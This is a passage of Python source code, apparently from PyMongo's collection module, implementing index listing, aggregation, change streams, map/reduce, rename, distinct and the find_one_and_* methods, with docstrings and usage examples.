... print(index)
...
SON([(u'v', 1), (u'key', SON([(u'_id', 1)])),
(u'name', u'_id_'), (u'ns', u'test.test')])
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
An instance of :class:`~pymongo.command_cursor.CommandCursor`.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionadded:: 3.0
"""
codec_options = CodecOptions(SON)
coll = self.with_options(codec_options=codec_options,
read_preference=ReadPreference.PRIMARY)
read_pref = ((session and session._txn_read_preference())
or ReadPreference.PRIMARY)
def _cmd(session, server, sock_info, slave_ok):
cmd = SON([("listIndexes", self.__name), ("cursor", {})])
if sock_info.max_wire_version > 2:
with self.__database.client._tmp_session(session, False) as s:
try:
cursor = self._command(sock_info, cmd, slave_ok,
read_pref,
codec_options,
session=s)["cursor"]
except OperationFailure as exc:
# Ignore NamespaceNotFound errors to match the behavior
# of reading from *.system.indexes.
if exc.code != 26:
raise
cursor = {'id': 0, 'firstBatch': []}
return CommandCursor(coll, cursor, sock_info.address,
session=s,
explicit_session=session is not None)
else:
res = message._first_batch(
sock_info, self.__database.name, "system.indexes",
{"ns": self.__full_name}, 0, slave_ok, codec_options,
read_pref, cmd,
self.database.client._event_listeners)
cursor = res["cursor"]
# Note that a collection can only have 64 indexes, so there
# will never be a getMore call.
return CommandCursor(coll, cursor, sock_info.address)
return self.__database.client._retryable_read(
_cmd, read_pref, session)
def index_information(self, session=None):
"""Get information on this collection's indexes.
Returns a dictionary where the keys are index names (as
returned by create_index()) and the values are dictionaries
containing information about each index. The dictionary is
guaranteed to contain at least a single key, ``"key"`` which
is a list of (key, direction) pairs specifying the index (as
passed to create_index()). It will also contain any other
metadata about the indexes, except for the ``"ns"`` and
``"name"`` keys, which are cleaned. Example output might look
like this:
>>> db.test.create_index("x", unique=True)
u'x_1'
>>> db.test.index_information()
{u'_id_': {u'key': [(u'_id', 1)]},
u'x_1': {u'unique': True, u'key': [(u'x', 1)]}}
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
.. versionchanged:: 3.6
Added ``session`` parameter.
"""
cursor = self.list_indexes(session=session)
info = {}
for index in cursor:
index["key"] = index["key"].items()
index = dict(index)
info[index.pop("name")] = index
return info
def options(self, session=None):
"""Get the options set on this collection.
Returns a dictionary of options and their values - see
:meth:`~pymongo.database.Database.create_collection` for more
information on the possible options. Returns an empty
dictionary if the collection has not been created yet.
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
.. versionchanged:: 3.6
Added ``session`` parameter.
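A small illustrative sketch (names are made up for the example)::
    from pymongo import MongoClient
    metrics = MongoClient().example_db.metrics  # illustrative collection
    opts = metrics.options()
    # Empty dict if the collection does not exist yet; otherwise the
    # creation options, e.g. 'capped', 'size', or 'validator'.
    print(opts.get('capped', False))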
"""
dbo = self.__database.client.get_database(
self.__database.name,
self.codec_options,
self.read_preference,
self.write_concern,
self.read_concern)
cursor = dbo.list_collections(
session=session, filter={"name": self.__name})
result = None
for doc in cursor:
result = doc
break
if not result:
return {}
options = result.get("options", {})
if "create" in options:
del options["create"]
return options
def _aggregate(self, aggregation_command, pipeline, cursor_class, session,
explicit_session, **kwargs):
# Remove things that are not command options.
use_cursor = True
if "useCursor" in kwargs:
warnings.warn(
"The useCursor option is deprecated "
"and will be removed in PyMongo 4.0",
DeprecationWarning, stacklevel=2)
use_cursor = common.validate_boolean(
"useCursor", kwargs.pop("useCursor", True))
cmd = aggregation_command(
self, cursor_class, pipeline, kwargs, explicit_session,
user_fields={'cursor': {'firstBatch': 1}}, use_cursor=use_cursor)
return self.__database.client._retryable_read(
cmd.get_cursor, cmd.get_read_preference(session), session,
retryable=not cmd._performs_write)
def aggregate(self, pipeline, session=None, **kwargs):
"""Perform an aggregation using the aggregation framework on this
collection.
All optional `aggregate command`_ parameters should be passed as
keyword arguments to this method. Valid options include, but are not
limited to:
- `allowDiskUse` (bool): Enables writing to temporary files. When set
to True, aggregation stages can write data to the _tmp subdirectory
of the --dbpath directory. The default is False.
- `maxTimeMS` (int): The maximum amount of time to allow the operation
to run in milliseconds.
- `batchSize` (int): The maximum number of documents to return per
batch. Ignored if the connected mongod or mongos does not support
returning aggregate results using a cursor, or `useCursor` is
``False``.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `useCursor` (bool): Deprecated. Will be removed in PyMongo 4.0.
The :meth:`aggregate` method obeys the :attr:`read_preference` of this
:class:`Collection`, except when ``$out`` or ``$merge`` are used, in
which case :attr:`~pymongo.read_preferences.ReadPreference.PRIMARY`
is used.
.. note:: This method does not support the 'explain' option. Please
use :meth:`~pymongo.database.Database.command` instead. An
example is included in the :ref:`aggregate-examples` documentation.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
:Parameters:
- `pipeline`: a list of aggregation pipeline stages
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): See list of options above.
:Returns:
A :class:`~pymongo.command_cursor.CommandCursor` over the result
set.
.. versionchanged:: 3.9
Apply this collection's read concern to pipelines containing the
`$out` stage when connected to MongoDB >= 4.2.
Added support for the ``$merge`` pipeline stage.
Aggregations that write always use read preference
:attr:`~pymongo.read_preferences.ReadPreference.PRIMARY`.
.. versionchanged:: 3.6
Added the `session` parameter. Added the `maxAwaitTimeMS` option.
Deprecated the `useCursor` option.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4. Support the `collation` option.
.. versionchanged:: 3.0
The :meth:`aggregate` method always returns a CommandCursor. The
pipeline argument must be a list.
.. versionchanged:: 2.7
When the cursor option is used, return
:class:`~pymongo.command_cursor.CommandCursor` instead of
:class:`~pymongo.cursor.Cursor`.
.. versionchanged:: 2.6
Added cursor support.
.. versionadded:: 2.3
.. seealso:: :doc:`/examples/aggregation`
.. _aggregate command:
https://docs.mongodb.com/manual/reference/command/aggregate
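An illustrative pipeline sketch (database, collection, and field names
are made up for the example)::
    from pymongo import MongoClient
    orders = MongoClient().example_db.orders  # illustrative collection
    pipeline = [
        {'$match': {'status': 'shipped'}},
        {'$group': {'_id': '$customer_id', 'total': {'$sum': '$amount'}}},
        {'$sort': {'total': -1}},
    ]
    # allowDiskUse lets large $group/$sort stages spill to temp files.
    for doc in orders.aggregate(pipeline, allowDiskUse=True,
                                maxTimeMS=60000):
        print(doc)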
"""
with self.__database.client._tmp_session(session, close=False) as s:
return self._aggregate(_CollectionAggregationCommand,
pipeline,
CommandCursor,
session=s,
explicit_session=session is not None,
**kwargs)
def aggregate_raw_batches(self, pipeline, **kwargs):
"""Perform an aggregation and retrieve batches of raw BSON.
Similar to the :meth:`aggregate` method but returns a
:class:`~pymongo.cursor.RawBatchCursor`.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
>>> import bson
>>> cursor = db.test.aggregate_raw_batches([
... {'$project': {'x': {'$multiply': [2, '$x']}}}])
>>> for batch in cursor:
... print(bson.decode_all(batch))
.. note:: aggregate_raw_batches does not support sessions or auto
encryption.
.. versionadded:: 3.6
"""
# OP_MSG with document stream returns is required to support
# sessions.
if "session" in kwargs:
raise ConfigurationError(
"aggregate_raw_batches does not support sessions")
# OP_MSG is required to support encryption.
if self.__database.client._encrypter:
raise InvalidOperation(
"aggregate_raw_batches does not support auto encryption")
return self._aggregate(_CollectionRawAggregationCommand,
pipeline,
RawBatchCommandCursor,
session=None,
explicit_session=False,
**kwargs)
def watch(self, pipeline=None, full_document=None, resume_after=None,
max_await_time_ms=None, batch_size=None, collation=None,
start_at_operation_time=None, session=None, start_after=None):
"""Watch changes on this collection.
Performs an aggregation with an implicit initial ``$changeStream``
stage and returns a
:class:`~pymongo.change_stream.CollectionChangeStream` cursor which
iterates over changes on this collection.
Introduced in MongoDB 3.6.
.. code-block:: python
with db.collection.watch() as stream:
for change in stream:
print(change)
The :class:`~pymongo.change_stream.CollectionChangeStream` iterable
blocks until the next change document is returned or an error is
raised. If the
:meth:`~pymongo.change_stream.CollectionChangeStream.next` method
encounters a network error when retrieving a batch from the server,
it will automatically attempt to recreate the cursor such that no
change events are missed. Any error encountered during the resume
attempt indicates there may be an outage and will be raised.
.. code-block:: python
try:
with db.collection.watch(
[{'$match': {'operationType': 'insert'}}]) as stream:
for insert_change in stream:
print(insert_change)
except pymongo.errors.PyMongoError:
# The ChangeStream encountered an unrecoverable error or the
# resume attempt failed to recreate the cursor.
logging.error('...')
For a precise description of the resume process see the
`change streams specification`_.
.. note:: Using this helper method is preferred to directly calling
:meth:`~pymongo.collection.Collection.aggregate` with a
``$changeStream`` stage, for the purpose of supporting
resumability.
.. warning:: This Collection's :attr:`read_concern` must be
``ReadConcern("majority")`` in order to use the ``$changeStream``
stage.
:Parameters:
- `pipeline` (optional): A list of aggregation pipeline stages to
append to an initial ``$changeStream`` stage. Not all
pipeline stages are valid after a ``$changeStream`` stage, see the
MongoDB documentation on change streams for the supported stages.
- `full_document` (optional): The fullDocument to pass as an option
to the ``$changeStream`` stage. Allowed values: 'updateLookup'.
When set to 'updateLookup', the change notification for partial
updates will include both a delta describing the changes to the
document, as well as a copy of the entire document that was
changed from some time after the change occurred.
- `resume_after` (optional): A resume token. If provided, the
change stream will start returning changes that occur directly
after the operation specified in the resume token. A resume token
is the _id value of a change document.
- `max_await_time_ms` (optional): The maximum time in milliseconds
for the server to wait for changes before responding to a getMore
operation.
- `batch_size` (optional): The maximum number of documents to return
per batch.
- `collation` (optional): The :class:`~pymongo.collation.Collation`
to use for the aggregation.
- `start_at_operation_time` (optional): If provided, the resulting
change stream will only return changes that occurred at or after
the specified :class:`~bson.timestamp.Timestamp`. Requires
MongoDB >= 4.0.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `start_after` (optional): The same as `resume_after` except that
`start_after` can resume notifications after an invalidate event.
This option and `resume_after` are mutually exclusive.
:Returns:
A :class:`~pymongo.change_stream.CollectionChangeStream` cursor.
.. versionchanged:: 3.9
Added the ``start_after`` parameter.
.. versionchanged:: 3.7
Added the ``start_at_operation_time`` parameter.
.. versionadded:: 3.6
.. mongodoc:: changeStreams
.. _change streams specification:
https://github.com/mongodb/specifications/blob/master/source/change-streams/change-streams.rst
"""
return CollectionChangeStream(
self, pipeline, full_document, resume_after, max_await_time_ms,
batch_size, collation, start_at_operation_time, session,
start_after)
def group(self, key, condition, initial, reduce, finalize=None, **kwargs):
"""Perform a query similar to an SQL *group by* operation.
**DEPRECATED** - The group command was deprecated in MongoDB 3.4. The
:meth:`~group` method is deprecated and will be removed in PyMongo 4.0.
Use :meth:`~aggregate` with the `$group` stage or :meth:`~map_reduce`
instead.
.. versionchanged:: 3.5
Deprecated the group method.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 2.2
Removed deprecated argument: command
"""
warnings.warn("The group method is deprecated and will be removed in "
"PyMongo 4.0. Use the aggregate method with the $group "
"stage or the map_reduce method instead.",
DeprecationWarning, stacklevel=2)
group = {}
if isinstance(key, string_type):
group["$keyf"] = Code(key)
elif key is not None:
group = {"key": helpers._fields_list_to_dict(key, "key")}
group["ns"] = self.__name
group["$reduce"] = Code(reduce)
group["cond"] = condition
group["initial"] = initial
if finalize is not None:
group["finalize"] = Code(finalize)
cmd = SON([("group", group)])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
with self._socket_for_reads(session=None) as (sock_info, slave_ok):
return self._command(sock_info, cmd, slave_ok,
collation=collation,
user_fields={'retval': 1})["retval"]
def rename(self, new_name, session=None, **kwargs):
"""Rename this collection.
If operating in auth mode, client must be authorized as an
admin to perform this operation. Raises :class:`TypeError` if
`new_name` is not an instance of :class:`basestring`
(:class:`str` in python 3). Raises :class:`~pymongo.errors.InvalidName`
if `new_name` is not a valid collection name.
:Parameters:
- `new_name`: new name for this collection
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional arguments to the rename command
may be passed as keyword arguments to this helper method
(i.e. ``dropTarget=True``)
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
"""
if not isinstance(new_name, string_type):
raise TypeError("new_name must be an "
"instance of %s" % (string_type.__name__,))
if not new_name or ".." in new_name:
raise InvalidName("collection names cannot be empty")
if new_name[0] == "." or new_name[-1] == ".":
raise InvalidName("collecion names must not start or end with '.'")
if "$" in new_name and not new_name.startswith("oplog.$main"):
raise InvalidName("collection names must not contain '$'")
new_name = "%s.%s" % (self.__database.name, new_name)
cmd = SON([("renameCollection", self.__full_name), ("to", new_name)])
cmd.update(kwargs)
write_concern = self._write_concern_for_cmd(cmd, session)
with self._socket_for_writes(session) as sock_info:
with self.__database.client._tmp_session(session) as s:
return sock_info.command(
'admin', cmd,
write_concern=write_concern,
parse_write_concern_error=True,
session=s, client=self.__database.client)
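# A minimal usage sketch for rename (hedged; the 'events' and 'events_archive'
# collection names are hypothetical, not taken from this module):
#
#   db.events.rename('events_archive', dropTarget=True)
#
# Extra keyword arguments such as dropTarget are forwarded to the
# renameCollection command via **kwargs.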
def distinct(self, key, filter=None, session=None, **kwargs):
"""Get a list of distinct values for `key` among all documents
in this collection.
Raises :class:`TypeError` if `key` is not an instance of
:class:`basestring` (:class:`str` in python 3).
All optional distinct parameters should be passed as keyword arguments
to this method. Valid options include:
- `maxTimeMS` (int): The maximum amount of time to allow the count
command to run, in milliseconds.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
The :meth:`distinct` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `key`: name of the field for which we want to get the distinct
values
- `filter` (optional): A query document that specifies the documents
from which to retrieve the distinct values.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): See list of options above.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Support the `collation` option.
"""
if not isinstance(key, string_type):
raise TypeError("key must be an "
"instance of %s" % (string_type.__name__,))
cmd = SON([("distinct", self.__name),
("key", key)])
if filter is not None:
if "query" in kwargs:
raise ConfigurationError("can't pass both filter and query")
kwargs["query"] = filter
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
def _cmd(session, server, sock_info, slave_ok):
return self._command(
sock_info, cmd, slave_ok, read_concern=self.read_concern,
collation=collation, session=session,
user_fields={"values": 1})["values"]
return self.__database.client._retryable_read(
_cmd, self._read_preference_for(session), session)
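# A minimal usage sketch for distinct (hedged; the 'orders' collection and
# 'status'/'archived' fields are illustrative, not from this module):
#
#   statuses = db.orders.distinct('status', {'archived': False}, maxTimeMS=500)
#
# The optional filter becomes the command's "query" argument, and keyword
# arguments such as maxTimeMS are forwarded to the distinct command.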
def _map_reduce(self, map, reduce, out, session, read_pref, **kwargs):
"""Internal mapReduce helper."""
cmd = SON([("mapReduce", self.__name),
("map", map),
("reduce", reduce),
("out", out)])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
inline = 'inline' in out
if inline:
user_fields = {'results': 1}
else:
user_fields = None
read_pref = ((session and session._txn_read_preference())
or read_pref)
with self.__database.client._socket_for_reads(read_pref, session) as (
sock_info, slave_ok):
if (sock_info.max_wire_version >= 4 and
('readConcern' not in cmd) and
inline):
read_concern = self.read_concern
else:
read_concern = None
if 'writeConcern' not in cmd and not inline:
write_concern = self._write_concern_for(session)
else:
write_concern = None
return self._command(
sock_info, cmd, slave_ok, read_pref,
read_concern=read_concern,
write_concern=write_concern,
collation=collation, session=session,
user_fields=user_fields)
def map_reduce(self, map, reduce, out, full_response=False, session=None,
**kwargs):
"""Perform a map/reduce operation on this collection.
If `full_response` is ``False`` (default) returns a
:class:`~pymongo.collection.Collection` instance containing
the results of the operation. Otherwise, returns the full
response from the server to the `map reduce command`_.
:Parameters:
- `map`: map function (as a JavaScript string)
- `reduce`: reduce function (as a JavaScript string)
- `out`: output collection name or `out object` (dict). See
the `map reduce command`_ documentation for available options.
Note: `out` options are order sensitive. :class:`~bson.son.SON`
can be used to specify multiple options.
e.g. SON([('replace', <collection name>), ('db', <database name>)])
- `full_response` (optional): if ``True``, return full response to
this command - otherwise just return the result collection
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional arguments to the
`map reduce command`_ may be passed as keyword arguments to this
helper method, e.g.::
>>> db.test.map_reduce(map, reduce, "myresults", limit=2)
.. note:: The :meth:`map_reduce` method does **not** obey the
:attr:`read_preference` of this :class:`Collection`. To run
mapReduce on a secondary use the :meth:`inline_map_reduce` method
instead.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation (if the
output is not inline) when using MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
.. seealso:: :doc:`/examples/aggregation`
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 2.2
Removed deprecated arguments: merge_output and reduce_output
.. _map reduce command: http://docs.mongodb.org/manual/reference/command/mapReduce/
.. mongodoc:: mapreduce
"""
if not isinstance(out, (string_type, abc.Mapping)):
raise TypeError("'out' must be an instance of "
"%s or a mapping" % (string_type.__name__,))
response = self._map_reduce(map, reduce, out, session,
ReadPreference.PRIMARY, **kwargs)
if full_response or not response.get('result'):
return response
elif isinstance(response['result'], dict):
dbase = response['result']['db']
coll = response['result']['collection']
return self.__database.client[dbase][coll]
else:
return self.__database[response["result"]]
def inline_map_reduce(self, map, reduce, full_response=False, session=None,
**kwargs):
"""Perform an inline map/reduce operation on this collection.
Perform the map/reduce operation on the server in RAM. A result
collection is not created. The result set is returned as a list
of documents.
If `full_response` is ``False`` (default) returns the
result documents in a list. Otherwise, returns the full
response from the server to the `map reduce command`_.
The :meth:`inline_map_reduce` method obeys the :attr:`read_preference`
of this :class:`Collection`.
:Parameters:
- `map`: map function (as a JavaScript string)
- `reduce`: reduce function (as a JavaScript string)
- `full_response` (optional): if ``True``, return full response to
this command - otherwise just return the result collection
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional arguments to the
`map reduce command`_ may be passed as keyword arguments to this
helper method, e.g.::
>>> db.test.inline_map_reduce(map, reduce, limit=2)
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
"""
res = self._map_reduce(map, reduce, {"inline": 1}, session,
self.read_preference, **kwargs)
if full_response:
return res
else:
return res.get("results")
def _write_concern_for_cmd(self, cmd, session):
raw_wc = cmd.get('writeConcern')
if raw_wc is not None:
return WriteConcern(**raw_wc)
else:
return self._write_concern_for(session)
def __find_and_modify(self, filter, projection, sort, upsert=None,
return_document=ReturnDocument.BEFORE,
array_filters=None, session=None, **kwargs):
"""Internal findAndModify helper."""
common.validate_is_mapping("filter", filter)
if not isinstance(return_document, bool):
raise ValueError("return_document must be "
"ReturnDocument.BEFORE or ReturnDocument.AFTER")
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd = SON([("findAndModify", self.__name),
("query", filter),
("new", return_document)])
cmd.update(kwargs)
if projection is not None:
cmd["fields"] = helpers._fields_list_to_dict(projection,
"projection")
if sort is not None:
cmd["sort"] = helpers._index_document(sort)
if upsert is not None:
common.validate_boolean("upsert", upsert)
cmd["upsert"] = upsert
write_concern = self._write_concern_for_cmd(cmd, session)
def _find_and_modify(session, sock_info, retryable_write):
if array_filters is not None:
if sock_info.max_wire_version < 6:
raise ConfigurationError(
'Must be connected to MongoDB 3.6+ to use '
'arrayFilters.')
if not write_concern.acknowledged:
raise ConfigurationError(
'arrayFilters is unsupported for unacknowledged '
'writes.')
cmd["arrayFilters"] = array_filters
if (sock_info.max_wire_version >= 4 and
not write_concern.is_server_default):
cmd['writeConcern'] = write_concern.document
out = self._command(sock_info, cmd,
read_preference=ReadPreference.PRIMARY,
write_concern=write_concern,
collation=collation, session=session,
retryable_write=retryable_write,
user_fields=_FIND_AND_MODIFY_DOC_FIELDS)
_check_write_command_response(out)
return out.get("value")
return self.__database.client._retryable_write(
write_concern.acknowledged, _find_and_modify, session)
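# For reference, a hedged sketch of the command document __find_and_modify
# builds above (field values are illustrative only):
#
#   SON([('findAndModify', 'coll_name'),
#        ('query', {'x': 1}),
#        ('new', False),             # return_document
#        ('fields', {'_id': 1}),     # projection, if given
#        ('sort', SON([('x', 1)])),  # sort, if given
#        ('upsert', True),           # upsert, if given
#        ('arrayFilters', [...]),    # MongoDB 3.6+ only
#        ('writeConcern', {...})])   # when not the server default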
def find_one_and_delete(self, filter,
projection=None, sort=None, session=None, **kwargs):
"""Finds a single document and deletes it, returning the document.
>>> db.test.count_documents({'x': 1})
2
>>> db.test.find_one_and_delete({'x': 1})
{u'x': 1, u'_id': ObjectId('54f4e12bfba5220aa4d6dee8')}
>>> db.test.count_documents({'x': 1})
1
If multiple documents match *filter*, a *sort* can be applied.
>>> for doc in db.test.find({'x': 1}):
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> db.test.find_one_and_delete(
... {'x': 1}, sort=[('_id', pymongo.DESCENDING)])
{u'x': 1, u'_id': 2}
The *projection* option can be used to limit the fields returned.
>>> db.test.find_one_and_delete({'x': 1}, projection={'_id': False})
{u'x': 1}
:Parameters:
- `filter`: A query that matches the document to delete.
- `projection` (optional): a list of field names that should be
returned in the result document or a mapping specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a mapping to exclude fields from
the result (e.g. projection={'_id': False}).
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for the query. If multiple documents
match the query, they are sorted and the first is deleted.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional command arguments can be passed
as keyword arguments (for example maxTimeMS can be used with
recent server versions).
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.2
Respects write concern.
.. warning:: Starting in PyMongo 3.2, this command uses the
:class:`~pymongo.write_concern.WriteConcern` of this
:class:`~pymongo.collection.Collection` when connected to MongoDB >=
3.2. Note that using an elevated write concern with this command may
be slower compared to using the default write concern.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionadded:: 3.0
"""
kwargs['remove'] = True
return self.__find_and_modify(filter, projection, sort,
session=session, **kwargs)
def find_one_and_replace(self, filter, replacement,
projection=None, sort=None, upsert=False,
return_document=ReturnDocument.BEFORE,
session=None, **kwargs):
"""Finds a single document and replaces it, returning either the
original or the replaced document.
The :meth:`find_one_and_replace` method differs from
:meth:`find_one_and_update` by replacing the document matched by
*filter*, rather than modifying the existing document.
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> db.test.find_one_and_replace({'x': 1}, {'y': 1})
{u'x': 1, u'_id': 0}
>>> for doc in db.test.find({}):
... print(doc)
...
{u'y': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
:Parameters:
- `filter`: A query that matches the document to replace.
- `replacement`: The replacement document.
- `projection` (optional): A list of field names that should be
returned in the result document or a mapping specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a mapping to exclude fields from
the result (e.g. projection={'_id': False}).
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for the query. If multiple documents
match the query, they are sorted and the first is replaced.
- `upsert` (optional): When ``True``, inserts a new document if no
document matches the query. Defaults to ``False``.
- `return_document`: If
:attr:`ReturnDocument.BEFORE` (the default),
returns the original document before it was replaced, or ``None``
if no document matches. If
:attr:`ReturnDocument.AFTER`, returns the replaced
or inserted document.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional command arguments can be passed
as keyword arguments (for example maxTimeMS can be used with
recent server versions).
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Respects write concern.
.. warning:: Starting in PyMongo 3.2, this command uses the
:class:`~pymongo.write_concern.WriteConcern` of this
:class:`~pymongo.collection.Collection` when connected to MongoDB >=
3.2. Note that using an elevated write concern with this command may
be slower compared to using the default write concern.
.. versionadded:: 3.0
"""
common.validate_ok_for_replace(replacement)
kwargs['update'] = replacement
return self.__find_and_modify(filter, projection,
sort, upsert, return_document,
session=session, **kwargs)
def find_one_and_update(self, filter, update,
projection=None, sort=None, upsert=False,
return_document=ReturnDocument.BEFORE,
array_filters=None, session=None, **kwargs):
"""Finds a single document and updates it, returning either the
original or the updated document.
>>> db.test.find_one_and_update(
... {'_id': 665}, {'$inc': {'count': 1}, '$set': {'done': True}})
{u'_id': 665, u'done': False, u'count': 25}
Returns ``None`` if no document matches the filter.
>>> db.test.find_one_and_update(
... {'_exists': False}, {'$inc': {'count': 1}})
When the filter matches, by default :meth:`find_one_and_update`
returns the original version of the document before the update was
applied. To return the updated (or inserted in the case of
*upsert*) version of the document instead, use the *return_document*
option.
>>> from pymongo import ReturnDocument
>>> db.example.find_one_and_update(
... {'_id': 'userid'},
... {'$inc': {'seq': 1}},
... return_document=ReturnDocument.AFTER)
{u'_id': u'userid', u'seq': 1}
You can limit the fields returned with the *projection* option.
>>> db.example.find_one_and_update(
... {'_id': 'userid'},
... {'$inc': {'seq': 1}},
... projection={'seq': True, '_id': False},
... return_document=ReturnDocument.AFTER)
{u'seq': 2}
The *upsert* option can be used to create the document if it doesn't
already exist.
>>> db.example.delete_many({}).deleted_count
1
>>> db.example.find_one_and_update(
... {'_id': 'userid'},
... {'$inc': {'seq': 1}},
... projection={'seq': True, '_id': False},
... upsert=True,
... return_document=ReturnDocument.AFTER)
{u'seq': 1}
If multiple documents match *filter*, a *sort* can be applied.
>>> for doc in db.test.find({'done': True}):
... print(doc)
...
{u'_id': 665, u'done': True, u'result': {u'count': 26}}
{u'_id': 701, u'done': True, u'result': {u'count': 17}}
>>> db.test.find_one_and_update(
... {'done': True},
... {'$set': {'final': True}},
... sort=[('_id', pymongo.DESCENDING)])
{u'_id': 701, u'done': True, u'result': {u'count': 17}}
:Parameters:
- `filter`: A query that matches the document to update.
- `update`: The update operations to apply.
- `projection` (optional): A list of field names that should be
returned in the result document or a mapping specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a dict to exclude fields from
the result (e.g. projection={'_id': False}).
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for the query. If multiple documents
match the query, they are sorted and the first is updated.
- `upsert` (optional): When ``True``, inserts a new document if no
document matches the query. Defaults to ``False``.
- `return_document`: If
:attr:`ReturnDocument.BEFORE` (the default),
returns the original document before it was updated. If
:attr:`ReturnDocument.AFTER`, returns the updated
or inserted document.
- `array_filters` (optional): A list of filters specifying which
array elements an update should apply. Requires MongoDB 3.6+.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional command arguments can be passed
as keyword arguments (for example maxTimeMS can be used with
recent server versions).
.. versionchanged:: 3.9
Added the ability to accept a pipeline as the `update`.
.. versionchanged:: 3.6
Added the `array_filters` and `session` options.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Respects write concern.
.. warning:: Starting in PyMongo 3.2, this command uses the
:class:`~pymongo.write_concern.WriteConcern` of this
:class:`~pymongo.collection.Collection` when connected to MongoDB >=
3.2. Note that using an elevated write concern with this command may
be slower compared to using the default write concern.
.. versionadded:: 3.0
"""
common.validate_ok_for_update(update)
common.validate_list_or_none('array_filters', array_filters)
kwargs['update'] = update
return self.__find_and_modify(filter, projection,
sort, upsert, return_document,
array_filters, session=session, **kwargs)
def save(self, to_save, manipulate=True, check_keys=True, **kwargs):
"""Save a document in this collection.
**DEPRECATED** - Use :meth:`insert_one` or :meth:`replace_one` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("save is deprecated. Use insert_one or replace_one "
"instead", DeprecationWarning, stacklevel=2)
common.validate_is_document_type("to_save", to_save)
write_concern = None
collation = validate_collation_or_none(kwargs.pop('collation', None))
if kwargs:
write_concern = WriteConcern(**kwargs)
if not (isinstance(to_save, RawBSONDocument) or "_id" in to_save):
return self._insert(
to_save, True, check_keys, manipulate, write_concern)
else:
self._update_retryable(
{"_id": to_save["_id"]}, to_save, True,
check_keys, False, manipulate, write_concern,
collation=collation)
return to_save.get("_id")
def insert(self, doc_or_docs, manipulate=True,
check_keys=True, continue_on_error=False, **kwargs):
"""Insert a document(s) into this collection.
**DEPRECATED** - Use :meth:`insert_one` or :meth:`insert_many` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("insert is deprecated. Use insert_one or insert_many "
"instead.", DeprecationWarning, stacklevel=2)
write_concern = None
if kwargs:
write_concern = WriteConcern(**kwargs)
return self._insert(doc_or_docs, not continue_on_error,
check_keys, manipulate, write_concern)
def update(self, spec, document, upsert=False, manipulate=False,
multi=False, check_keys=True, **kwargs):
"""Update a document(s) in this collection.
**DEPRECATED** - Use :meth:`replace_one`, :meth:`update_one`, or
:meth:`update_many` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("update is deprecated. Use replace_one, update_one or "
"update_many instead.", DeprecationWarning, stacklevel=2)
